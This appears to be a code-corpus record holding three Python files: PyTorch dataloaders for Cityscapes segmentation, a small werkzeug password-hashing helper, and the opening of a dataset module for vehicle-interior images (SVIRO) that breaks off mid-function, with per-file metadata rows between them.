scale=(0.5, 2.0), size=(1024, 512), scale1 = 1, scale2 = 2, ignore_idx=255):
print("This input size is " +str(size))
if not os.path.isfile(cached_data_file):
dataLoad = ld.LoadData(data_dir, classes, cached_data_file)
data = dataLoad.processData()
if data is None:
print('Error while pickling data. Please check.')
exit(-1)
else:
data = pickle.load(open(cached_data_file, "rb"))
if isinstance(size, tuple):
size = size
else:
size = (size, size)
if isinstance(scale, tuple):
scale = scale
else:
scale = (scale, scale)
train_transforms = pilTransforms.Compose(
[
# pilTransforms.data_aug_color(),
pilTransforms.RandomScale(scale=scale),
pilTransforms.RandomCrop(crop_size=size,ignore_idx=ignore_idx),
pilTransforms.RandomFlip(),
pilTransforms.DoubleNormalize(scale1=scale1, scale2=scale2)
]
)
val_transforms = pilTransforms.Compose(
[
pilTransforms.Resize(size=size),
pilTransforms.DoubleNormalize(scale1=scale2, scale2=1)
]
)
trainLoader = torch.utils.data.DataLoader(
myDataLoader.PILDataset(data['trainIm'], data['trainAnnot'], Double=True, transform=train_transforms),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
valLoader = torch.utils.data.DataLoader(
myDataLoader.PILDataset(data['valIm'], data['valAnnot'], Double=True, transform=val_transforms),
batch_size=batch_size, shuffle=False, num_workers=num_work, pin_memory=True)
return trainLoader, valLoader, data
def cityPIL_randscalecrop( cached_data_file, data_dir, classes, batch_size, num_work=6,
scale=(0.5, 2.0), size=(1024, 512), scale1 = 1, ignore_idx=255):
print("This input size is " +str(size))
if not os.path.isfile(cached_data_file):
dataLoad = ld.LoadData(data_dir, classes, cached_data_file)
data = dataLoad.processData()
if data is None:
print('Error while pickling data. Please check.')
exit(-1)
else:
data = pickle.load(open(cached_data_file, "rb"))
if isinstance(size, tuple):
size = size
else:
size = (size, size)
if isinstance(scale, tuple):
scale = scale
else:
scale = (scale, scale)
train_transforms = pilTransforms.Compose(
[
pilTransforms.RandomScale(scale=scale),
pilTransforms.RandomCrop(crop_size=size,ignore_idx=ignore_idx),
pilTransforms.RandomFlip(),
pilTransforms.Normalize(scaleIn=scale1)
]
)
val_transforms = pilTransforms.Compose(
[
pilTransforms.Resize(size=size),
pilTransforms.Normalize(scaleIn=1)
]
)
trainLoader = torch.utils.data.DataLoader(
myDataLoader.PILDataset(data['trainIm'], data['trainAnnot'], Double=False, transform=train_transforms),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
valLoader = torch.utils.data.DataLoader(
myDataLoader.PILDataset(data['valIm'], data['valAnnot'], Double=False, transform=val_transforms),
batch_size=batch_size, shuffle=False, num_workers=num_work, pin_memory=True)
return trainLoader, valLoader, data
def cityPIL_randcrop( cached_data_file, data_dir, classes, batch_size, num_work=6,
size=(1024, 512), crop_size=(1024, 512), scale1 = 1, ignore_idx=255):
print("This input size is " +str(size))
if not os.path.isfile(cached_data_file):
dataLoad = ld.LoadData(data_dir, classes, cached_data_file)
data = dataLoad.processData()
if data is None:
print('Error while pickling data. Please check.')
exit(-1)
else:
data = pickle.load(open(cached_data_file, "rb"))
train_transforms = pilTransforms.Compose(
[
pilTransforms.Resize(size=size),
pilTransforms.RandomCrop(crop_size=crop_size,ignore_idx=ignore_idx),
pilTransforms.RandomFlip(),
pilTransforms.Normalize(scaleIn=scale1)
]
)
val_transforms = pilTransforms.Compose(
[
pilTransforms.Resize(size=(2048,1024)),
pilTransforms.Normalize(scaleIn=1)
]
)
trainLoader = torch.utils.data.DataLoader(
myDataLoader.PILDataset(data['trainIm'], data['trainAnnot'], Double=False, transform=train_transforms),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
valLoader = torch.utils.data.DataLoader(
myDataLoader.PILDataset(data['valIm'], data['valAnnot'], Double=False, transform=val_transforms),
batch_size=batch_size//2, shuffle=False, num_workers=num_work, pin_memory=True)
return trainLoader, valLoader, data
def cityCV_dataloader(cached_data_file, data_dir, classes, batch_size, scaleIn, size=1024, num_work=6):
if size == 1024:
scale = [1024, 1536, 1280, 768, 512]
crop = [32,96,96,32,12]
elif size == 2048:
scale = [2048, 1536, 1280, 1024, 768]
crop = [96,96,64,32,32]
else:
scale = [1024, 1536, 1280, 768, 512]
crop = [32,100,100,32,0]
if not os.path.isfile(cached_data_file):
dataLoad = ld.LoadData(data_dir, classes, cached_data_file)
data = dataLoad.processData()
if data is None:
print('Error while pickling data. Please check.')
exit(-1)
else:
data = pickle.load(open(cached_data_file, "rb"))
trainDataset_main = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[0],scale[0]//2), #(1024, 512),
cvTransforms.RandomCropResize(crop[0]), #(32),
cvTransforms.RandomFlip(),
# cvTransforms.RandomCrop(64).
cvTransforms.ToTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[0],scale[0]//2,crop[0]))
trainDataset_scale1 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[1],scale[1]//2), # 1536, 768
cvTransforms.RandomCropResize(crop[1]),
cvTransforms.RandomFlip(),
# cvTransforms.RandomCrop(64),
cvTransforms.ToTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[1],scale[1]//2,crop[1]))
trainDataset_scale2 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[2],scale[2]//2), # 1536, 768
cvTransforms.RandomCropResize(crop[2]),
cvTransforms.RandomFlip(),
# cvTransforms.RandomCrop(64),
cvTransforms.ToTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[2],scale[2]//2,crop[2]))
trainDataset_scale3 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[3],scale[3]//2), #(768, 384),
cvTransforms.RandomCropResize(crop[3]),
cvTransforms.RandomFlip(),
# cvTransforms.RandomCrop(64),
cvTransforms.ToTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[3],scale[3]//2,crop[3]))
trainDataset_scale4 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[4],scale[4]//2),#(512, 256),
cvTransforms.RandomCropResize(crop[4]),
cvTransforms.RandomFlip(),
# cvTransforms.RandomCrop(64).
cvTransforms.ToTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[4],scale[4]//2,crop[4]))
valDataset = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[0],scale[0]//2), #(1024, 512),
cvTransforms.ToTensor(scaleIn),
#
])
print("%d , %d image size validation" %(scale[0],scale[0]//2))
trainLoader = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_main),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale1 = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale1),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale2 = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale2),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale3 = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale3),
batch_size=batch_size + 4, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale4 = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale4),
batch_size=batch_size + 4, shuffle=True, num_workers=num_work, pin_memory=True)
valLoader = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['valIm'], data['valAnnot'], transform=valDataset),
batch_size=batch_size, shuffle=False, num_workers=num_work, pin_memory=True)
return trainLoader, trainLoader_scale1, trainLoader_scale2, trainLoader_scale3, trainLoader_scale4, valLoader, data
def cityCVaux_dataloader(cached_data_file, data_dir, classes, batch_size, scaleIn, size=1024, num_work=6):
if size == 1024:
scale = [1024, 1536, 1280, 768, 512]
crop = [32,96,96,32,12]
elif size == 2048:
scale = [2048, 1536, 1280, 1024, 768]
crop = [96,96,64,32,32]
else:
scale = [1024, 1536, 1280, 768, 512]
crop = [32,100,100,32,0]
if not os.path.isfile(cached_data_file):
dataLoad = ld.LoadData(data_dir, classes, cached_data_file)
data = dataLoad.processData()
if data is None:
print('Error while pickling data. Please check.')
exit(-1)
else:
data = pickle.load(open(cached_data_file, "rb"))
trainDataset_main = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[0],scale[0]//2), #(1024, 512),
cvTransforms.RandomCropResize(crop[0]), #(32),
cvTransforms.RandomFlip(),
cvTransforms.ToMultiTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[0],scale[0]//2,crop[0]))
trainDataset_scale1 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[1],scale[1]//2), # 1536, 768
cvTransforms.RandomCropResize(crop[1]),
cvTransforms.RandomFlip(),
cvTransforms.ToMultiTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[1],scale[1]//2,crop[1]))
trainDataset_scale2 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[2],scale[2]//2), # 1536, 768
cvTransforms.RandomCropResize(crop[2]),
cvTransforms.RandomFlip(),
cvTransforms.ToMultiTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[2],scale[2]//2,crop[2]))
trainDataset_scale3 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[3],scale[3]//2), #(768, 384),
cvTransforms.RandomCropResize(crop[3]),
cvTransforms.RandomFlip(),
cvTransforms.ToMultiTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[3],scale[3]//2,crop[3]))
trainDataset_scale4 = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[4],scale[4]//2),#(512, 256),
cvTransforms.RandomCropResize(crop[4]),
cvTransforms.RandomFlip(),
cvTransforms.ToMultiTensor(scaleIn),
#
])
print("%d , %d image size train with %d crop" %(scale[4],scale[4]//2,crop[4]))
valDataset = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(scale[0],scale[0]//2), #(1024, 512),
cvTransforms.ToMultiTensor(1),
#
])
print("%d , %d image size validation" %(scale[0],scale[0]//2))
trainLoader = torch.utils.data.DataLoader(
myDataLoader.MyAuxDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_main),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale1 = torch.utils.data.DataLoader(
myDataLoader.MyAuxDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale1),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale2 = torch.utils.data.DataLoader(
myDataLoader.MyAuxDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale2),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale3 = torch.utils.data.DataLoader(
myDataLoader.MyAuxDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale3),
batch_size=batch_size + 4, shuffle=True, num_workers=num_work, pin_memory=True)
trainLoader_scale4 = torch.utils.data.DataLoader(
myDataLoader.MyAuxDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_scale4),
batch_size=batch_size + 4, shuffle=True, num_workers=num_work, pin_memory=True)
valLoader = torch.utils.data.DataLoader(
myDataLoader.MyAuxDataset(data['valIm'], data['valAnnot'], transform=valDataset),
batch_size=batch_size-2, shuffle=False, num_workers=num_work, pin_memory=True)
return trainLoader, trainLoader_scale1, trainLoader_scale2, trainLoader_scale3, trainLoader_scale4, valLoader, data
def cityCV_randscalecrop(cached_data_file, data_dir, classes, batch_size, size_h, size_w, scale, num_work=6):
print("This input size is %d , %d" %(size_h, size_w))
if not os.path.isfile(cached_data_file):
dataLoad = ld.LoadData(data_dir, classes, cached_data_file)
data = dataLoad.processData()
if data is None:
print('Error while pickling data. Please check.')
exit(-1)
else:
data = pickle.load(open(cached_data_file, "rb"))
trainDataset_main = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(size_w, size_h),
cvTransforms.RandomCropResize(32),
cvTransforms.RandomFlip(),
# cvTransforms.RandomCrop(64).
cvTransforms.ToTensor(scale),
#
])
valDataset = cvTransforms.Compose([
cvTransforms.Normalize(mean=data['mean'], std=data['std']),
cvTransforms.Scale(size_w, size_h),
cvTransforms.ToTensor(1),
#
])
trainLoader = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['trainIm'], data['trainAnnot'], transform=trainDataset_main),
batch_size=batch_size, shuffle=True, num_workers=num_work, pin_memory=True)
valLoader = torch.utils.data.DataLoader(
myDataLoader.MyDataset(data['valIm'], data['valAnnot'], transform=valDataset),
batch_size=batch_size, shuffle=False, num_workers=num_work, pin_memory=True)
return trainLoader, valLoader, data
# def get_dataloader(dataset_name, cached_data_file, data_dir, classes, batch_size, scaleIn=1, size_h=512, aux=False):
def get_dataloader(args):
dataset_name = args["dataset_name"]
data_file= args["cached_data_file"]
cls = args["classes"]
bs = args["batch_size"]
size_w = args["baseSize"]
size_h = size_w//2
print(" Train %s loader, call %s data_file , cls = %d" %(dataset_name, data_file, cls))
if dataset_name =='citymultiscaleCV':
num_work= args["num_work"]
return cityCV_dataloader(data_file, args["data_dir"], cls, bs, args["scaleIn"],size_w,num_work)
elif dataset_name =='cityCVaux_dataloader':
num_work= args["num_work"]
return cityCVaux_dataloader(data_file, args["data_dir"], cls, bs, args["scaleIn"],size_w,num_work)
elif dataset_name =='cityCV':
num_work = args["num_work"]
scale1 = args["scaleIn"]
return cityCV_randscalecrop(data_file, args["data_dir"], cls, bs, size_h, size_w, scale1, num_work)
elif dataset_name =="citypilAux":
scale1 = args["scale1"]
scale2 = args["scale2"]
num_work= args["num_work"]
return cityPIL_Doublerandscalecrop(data_file, args["data_dir"], cls, bs, num_work=num_work,
scale=(0.5, 2.0), size=(size_w, size_h), scale1 = scale1, scale2= scale2, ignore_idx=19)
elif dataset_name =="citypil":
scale1 = args["scaleIn"]
num_work= args["num_work"]
return cityPIL_randscalecrop(data_file, args["data_dir"], cls, bs, num_work=num_work,
scale=(0.5, 2.0), size=(size_w, size_h), scale1 = scale1, ignore_idx=19)
elif dataset_name == "citypilcrop":
scale1 = args["scaleIn"]
num_work = args["num_work"]
crop_size = args["crop_size"]
return cityPIL_randcrop(data_file, args["data_dir"], cls, bs, num_work=num_work,
size=(size_w, size_w), crop_size=(crop_size, crop_size), scale1=scale1, ignore_idx=19)
else:
print(dataset_name + "is not implemented")
raise NotImplementedError
| 39.575431
| 121
| 0.656047
| 2,186
| 18,363
| 5.356816
| 0.068161
| 0.036892
| 0.031085
| 0.040991
| 0.906149
| 0.898634
| 0.890094
| 0.885226
| 0.861913
| 0.8462
| 0
| 0.03766
| 0.210478
| 18,363
| 463
| 122
| 39.660907
| 0.770037
| 0.025268
| 0
| 0.752113
| 0
| 0
| 0.085097
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019718
| false
| 0
| 0.028169
| 0
| 0.08169
| 0.067606
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
798f96a1ac92dd9263c3561fcfcb91cebd1ff289
| 231
|
py
|
Python
|
mail/formspree-master/formspree/users/helpers.py
|
OVERLOADROBOTICA/OVERLOADROBOTICA.github.io
|
298cfe1283ca0686eb78a2e14a6275759f03c171
|
[
"MIT"
] | null | null | null |
mail/formspree-master/formspree/users/helpers.py
|
OVERLOADROBOTICA/OVERLOADROBOTICA.github.io
|
298cfe1283ca0686eb78a2e14a6275759f03c171
|
[
"MIT"
] | null | null | null |
mail/formspree-master/formspree/users/helpers.py
|
OVERLOADROBOTICA/OVERLOADROBOTICA.github.io
|
298cfe1283ca0686eb78a2e14a6275759f03c171
|
[
"MIT"
] | null | null | null |
from werkzeug.security import generate_password_hash, check_password_hash
def hash_pwd(password):
return generate_password_hash(password)
def check_password(hashed, password):
return check_password_hash(hashed, password)
| 28.875
| 73
| 0.831169
| 30
| 231
| 6.066667
| 0.4
| 0.263736
| 0.21978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108225
| 231
| 7
| 74
| 33
| 0.883495
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 1
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
7990c29af0fff9ce75755c245111d9dd6ce1f7ab
| 64,855
|
py
|
Python
|
dataset.py
|
SteveCruz/icpr2022-autoencoder-attractors
|
0935179b514fd49e1d2410005d91ff49db9978ac
|
[
"MIT"
] | null | null | null |
dataset.py
|
SteveCruz/icpr2022-autoencoder-attractors
|
0935179b514fd49e1d2410005d91ff49db9978ac
|
[
"MIT"
] | null | null | null |
dataset.py
|
SteveCruz/icpr2022-autoencoder-attractors
|
0935179b514fd49e1d2410005d91ff49db9978ac
|
[
"MIT"
] | null | null | null |
####################################################################################################################################################
####################################################################################################################################################
"""
Dataloader definitions for all the datasets used in our paper.
The datasets need to be downloaded manually and placed inside a same folder.
Specify your folder location in the following line
# directory containing all the datasets
ROOT_DATA_DIR = Path("")
"""
####################################################################################################################################################
####################################################################################################################################################
import os
import random
import numpy as np
from PIL import Image
from pathlib import Path
import torch
from torch.utils.data import Dataset
import torchvision.transforms.functional as TF
from torchvision.datasets import FashionMNIST as TFashionMNIST
from torchvision.datasets import CIFAR10 as TCIFAR10
from torchvision.datasets import SVHN as TSVHN
from torchvision.datasets import Omniglot as TOmniglot
from torchvision.datasets import Places365 as TPlaces365
from torchvision.datasets import LSUN as TLSUN
from torchvision.datasets import MNIST as TMNIST
import albumentations as album
from collections import defaultdict
####################################################################################################################################################
####################################################################################################################################################
# directory containing all the datasets
ROOT_DATA_DIR = Path("")
####################################################################################################################################################
class BaseDatasetCar(Dataset):
"""
Base class for all dataset classes for the vehicle interior.
"""
def __init__(self, root_dir, car, split, make_scene_impossible, make_instance_impossible, augment=False, nbr_of_samples_per_class=-1):
# path to the main folder
self.root_dir = Path(root_dir)
# which car are we using?
self.car = car
# train or test split
self.split = split
# are we using training data
self.is_train = True if "train" in self.split else False
# normal or impossible reconstruction loss?
self.make_scene_impossible = make_scene_impossible
self.make_instance_impossible = make_instance_impossible
# pre-process the data if necessary
self._pre_process_dataset()
# load the data into the memory
self._get_data()
# number of samples to keep for each class
self.nbr_of_samples_per_class = nbr_of_samples_per_class
# only get a subset of the data
self._get_subset_of_data()
# augmentations if needed
if augment:
self.augment = album.Compose(
[
album.Blur(always_apply=False, p=0.4, blur_limit=7),
album.RandomBrightnessContrast(always_apply=False, p=0.4, brightness_limit=(0.0, 0.33), contrast_limit=(0.0, 0.33), brightness_by_max=False),
album.MultiplicativeNoise(always_apply=False, p=0.4, elementwise=True, multiplier=(0.75, 1.25)),
]
)
else:
self.augment = False
# dict to match the concatenations of the three seat position classes into a single integer
self.label_str_to_int = {'0_0_0': 0, '0_0_3': 1, '0_3_0': 2, '3_0_0': 3, '0_3_3': 4, '3_0_3': 5, '3_3_0': 6, '3_3_3': 7}
# the revers of the above, to transform int labels back into strings
self.int_to_label_str = {v:k for k,v in self.label_str_to_int.items()}
def _get_subset_of_data(self):
# if we are training
if self.nbr_of_samples_per_class > 0:
# keep track of samples per class
counter = defaultdict(int)
# and the corresponding indices
keep_indices = []
# for each label
for idx, label in enumerate(self.labels):
# make sure its a string
label = self._get_classif_str(label)
# increase the counter for this label
counter[label] += 1
# if we are above the theshold for this label
if counter[label] >= (self.nbr_of_samples_per_class+1):
# then skip it
continue
else:
# otherwise keep track of the label
keep_indices.append(idx)
# only take the subset of indices based on how many samples per class to keep
self.images = [x for idx, x in enumerate(self.images) if idx in keep_indices]
self.labels = [x for idx, x in enumerate(self.labels) if idx in keep_indices]
def __len__(self):
"""
Return the total number of samples in the dataset.
"""
# number of images to use
return len(self.images)
def _get_data(self):
# get all folders with the sceneries
if self.car.lower() == "all":
self.folders = sorted(list(self.root_dir.glob(f"*/pp_{self.split}_64/*")))
else:
self.folders = sorted(list(self.root_dir.glob(f"{self.car}/pp_{self.split}_64/*")))
# placeholder for all images and labels
self.images = []
self.labels = []
# for each folder
for idx, folder in enumerate(self.folders):
# get classification labels for each seat from folder name
classif_labels = self._get_classif_label(folder)
# each scene will be an array of images
self.images.append([])
# get all the images for this scene
files = sorted(list(folder.glob("*.png")))
# for each file
for file in files:
# open the image specified by the path
# make sure it is a grayscale image
img = np.array(Image.open(file).convert("L"))
# append the image to the placeholder
self.images[idx].append(img)
# append label to placeholder
self.labels.append(classif_labels)
def _get_classif_label(self, file_path):
# get the filename only of the path
name = file_path.stem
# split at GT
gts = name.split("GT")[-1]
# split the elements at _
# first element is empty string, remove it
clean_gts = gts.split("_")[1:]
# convert the strings to ints
clean_gts = [int(x) for x in clean_gts]
# convert sviro labels to compare with other datasets
for index, value in enumerate(clean_gts):
# everyday objects and child seats to background
if value in [1,2,4,5,6]:
clean_gts[index] = 0
return clean_gts
def _get_classif_str(self, label):
return str(label[0]) + "_" + str(label[1]) + "_" + str(label[2])
def _pre_process_dataset(self):
# get all the subfolders inside the dataset folder
data_folder_variations = self.root_dir.glob("*")
# for each variation
for folder in data_folder_variations:
# for each split
for pre_processed_split in ["pp_train_64", "pp_test_64"]:
# create the path
path_to_preprocessed_split = folder / pre_processed_split
path_to_vanilla_split = folder / pre_processed_split.split("_")[1]
# if no pre-processing for these settings exists, then create them
if not path_to_preprocessed_split.exists():
print("-" * 37)
print(f"Pre-process and save data for folder: {folder} and split: {pre_processed_split} and downscale size: 64 ...")
self.pre_process_and_save_data(path_to_preprocessed_split, path_to_vanilla_split)
print("Pre-processing and saving finished.")
print("-" * 37)
def pre_process_and_save_data(self, path_to_preprocessed_split, path_to_vanilla_split):
"""
To speed up training, it is beneficial to do the rudementary pre-processing once and save the data.
"""
# create the folders to save the pre-processed data
path_to_preprocessed_split.mkdir()
# get all the files in all the subfolders
files = list(path_to_vanilla_split.glob(f"**/*.png"))
# for each image
for curr_file in files:
# open the image specified by the path
img = Image.open(curr_file).convert("L")
# center crop the image using the smaller size (i.e. width or height)
# to define the new size of the image (basically we remove only either the width or height)
img = TF.center_crop(img, np.min(img.size))
# then resize the image to the one we want to use for training
img = TF.resize(img, 64)
# create the folder for the experiment
save_folder = path_to_preprocessed_split / curr_file.parent.stem
save_folder.mkdir(exist_ok=True)
# save the processed image
img.save(save_folder / curr_file.name)
def _get_positive(self, rand_indices, positive_label, positive_images):
# get all the potential candidates which have the same label
masked = [idx for idx, x in enumerate(self.labels) if x==positive_label]
# if there is no other image with the same label
if not masked:
new_rand_indices = random.sample(range(0,len(positive_images)), 2)
positive_input_image = positive_images[new_rand_indices[0]]
positive_output_image = positive_images[new_rand_indices[1]] if self.make_scene_impossible else positive_images[new_rand_indices[0]]
positive_input_image = TF.to_tensor(positive_input_image)
positive_output_image = TF.to_tensor(positive_output_image)
else:
# choose one index randomly from the masked subset
index = np.random.choice(masked)
positive_input_image = self.images[index][rand_indices[0]]
positive_output_image = self.images[index][rand_indices[1]] if self.make_scene_impossible else self.images[index][rand_indices[0]]
positive_input_image = TF.to_tensor(positive_input_image)
positive_output_image = TF.to_tensor(positive_output_image)
return positive_input_image, positive_output_image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
images = self.images[index]
label = self.labels[index]
str_label = self._get_classif_str(label)
# randomly selected
# .) the input images
# .) the output images
rand_indices = random.sample(range(0,len(images)), 2)
# get the image to be used as input
input_image = images[rand_indices[0]]
# get the image to be used for the reconstruction error
output_image = images[rand_indices[1]] if self.make_scene_impossible else images[rand_indices[0]]
# make sure its a tensor
input_image = TF.to_tensor(input_image)
output_image = TF.to_tensor(output_image)
if self.make_instance_impossible:
_, output_image = self._get_positive(rand_indices, label, images)
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: input_image = torch.from_numpy(self.augment(image=np.array(input_image)[0])["image"][None,:])
return {"image":input_image, "target":output_image, "gt": self.label_str_to_int[str_label]}
####################################################################################################################################################
class SVIRO(BaseDatasetCar):
"""
https://sviro.kl.dfki.de
You only need the grayscale images for the whole scene.
Make sure to have a folder structure as follows:
SVIRO
├── aclass
│ ├── train
│ │ └──── grayscale_wholeImage
│ └── test
│ └──── grayscale_wholeImage
⋮
⋮
⋮
└── zoe
├── train
│ └──── grayscale_wholeImage
└── test
└──── grayscale_wholeImage
"""
def __init__(self, car, which_split, make_instance_impossible, augment):
# path to the main folder
root_dir = ROOT_DATA_DIR / "SVIRO"
# call the init function of the parent class
super().__init__(root_dir=root_dir, car=car, split=which_split, make_scene_impossible=False, make_instance_impossible=make_instance_impossible, augment=augment)
def _get_data(self):
# get all the png files, i.e. experiments
if self.car.lower() == "all":
self.files = sorted(list(self.root_dir.glob(f"*/{self.split}/grayscale_wholeImage_pp_640_64/*.png")))
else:
self.files = sorted(list(self.root_dir.glob(f"{self.car}/{self.split}/grayscale_wholeImage_pp_640_64/*.png")))
# placeholder for all images and labels
self.images = []
self.labels = []
# for each file
for file in self.files:
# get classification labels for each seat from folder name
classif_labels = self._get_classif_label(file)
# do not get child seats or everyday objects
if 1 in classif_labels or 2 in classif_labels or 4 in classif_labels or 5 in classif_labels or 6 in classif_labels:
continue
# open the image specified by the path
# make sure it is a grayscale image
img = np.array(Image.open(file).convert("L"))
# each scene will be an array of images
# append the image to the placeholder
self.images.append([img])
# append label to placeholder
self.labels.append(classif_labels)
def _get_classif_label(self, file_path):
# get the filename only of the path
name = file_path.stem
# split at GT
gts = name.split("GT")[-1]
# split the elements at _
# first element is empty string, remove it
clean_gts = gts.split("_")[1:]
# convert the strings to ints
clean_gts = [int(x) for x in clean_gts]
return clean_gts
def _pre_process_dataset(self):
# get all the subfolders inside the dataset folder
data_folder_variations = self.root_dir.glob("*/*")
# for each variation
for folder in data_folder_variations:
# create the path
path_to_preprocessed_split = folder / "grayscale_wholeImage_pp_640_64"
path_to_vanilla_split = folder / "grayscale_wholeImage"
# if no pre-processing for these settings exists, then create them
if not path_to_preprocessed_split.exists():
print("-" * 37)
print(f"Pre-process and save data for folder: {folder} and downscale size: 64 ...")
self.pre_process_and_save_data(path_to_preprocessed_split, path_to_vanilla_split)
print("Pre-processing and saving finished.")
print("-" * 37)
def pre_process_and_save_data(self, path_to_preprocessed_split, path_to_vanilla_split):
"""
To speed up training, it is beneficial to do the rudementary pre-processing once and save the data.
"""
# create the folders to save the pre-processed data
path_to_preprocessed_split.mkdir()
# get all the files in all the subfolders
files = list(path_to_vanilla_split.glob("*.png"))
# for each image
for curr_file in files:
# open the image specified by the path
img = Image.open(curr_file).convert("L")
# center crop the image using the smaller size (i.e. width or height)
# to define the new size of the image (basically we remove only either the width or height)
img = TF.center_crop(img, np.min(img.size))
# then resize the image to the one we want to use for training
img = TF.resize(img, 64)
# create the path to the file
save_path = path_to_preprocessed_split / curr_file.name
# save the processed image
img.save(save_path)
def _get_positive(self, positive_label):
# get all the potential candidates from the real images which have the same label as the synthetic one
masked = [idx for idx, x in enumerate(self.labels) if x==positive_label]
# choose one index randomly from the masked subset
index = np.random.choice(masked)
input_image = self.images[index][0]
input_image = TF.to_tensor(input_image)
return input_image
def __getitem__(self, index):
"""
Return an element from the dataset based on the index.
Parameters:
index -- an integer for data indexing
"""
# get the image and labels
image = self.images[index][0]
label = self.labels[index]
str_label = self._get_classif_str(label)
# transform it for pytorch (normalized and transposed)
image = TF.to_tensor(image)
if self.make_instance_impossible:
output_image = self._get_positive(label)
else:
output_image = image.clone()
# augment image if necessary (we need 0-channel input, not 1-channel input)
if self.augment: image = torch.from_numpy(self.augment(image=np.array(image)[0])["image"][None,:])
return {"image":image, "target":output_image, "gt": self.label_str_to_int[str_label]}
####################################################################################################################################################
class SVIROUncertainty(BaseDatasetCar):
"""
https://sviro.kl.dfki.de
Make sure to have a folder structure as follows:
SVIRO-Illumination
└── sharan
├── train
├── test-adults
├── test-objects
└── test-adults-and-objects
"""
def __init__(self, car, which_split, make_instance_impossible, nbr_of_samples_per_class, augment):
# path to the main folder
root_dir = ROOT_DATA_DIR / "SVIRO-Uncertainty"
# call the init function of the parent class
super().__init__(root_dir=root_dir, car=car, split=which_split, make_scene_impossible=False, make_instance_impossible=make_instance_impossible, nbr_of_samples_per_class=nbr_of_samples_per_class, augment=augment)
def _get_data(self):
# get all the png files, i.e. experiments
self.files = sorted(list(self.root_dir.glob(f"{self.car}/pp_{self.split}_64/*/ir.png")))
# placeholder for all images and labels
self.images = []
self.labels = []
# for each file
for file in self.files:
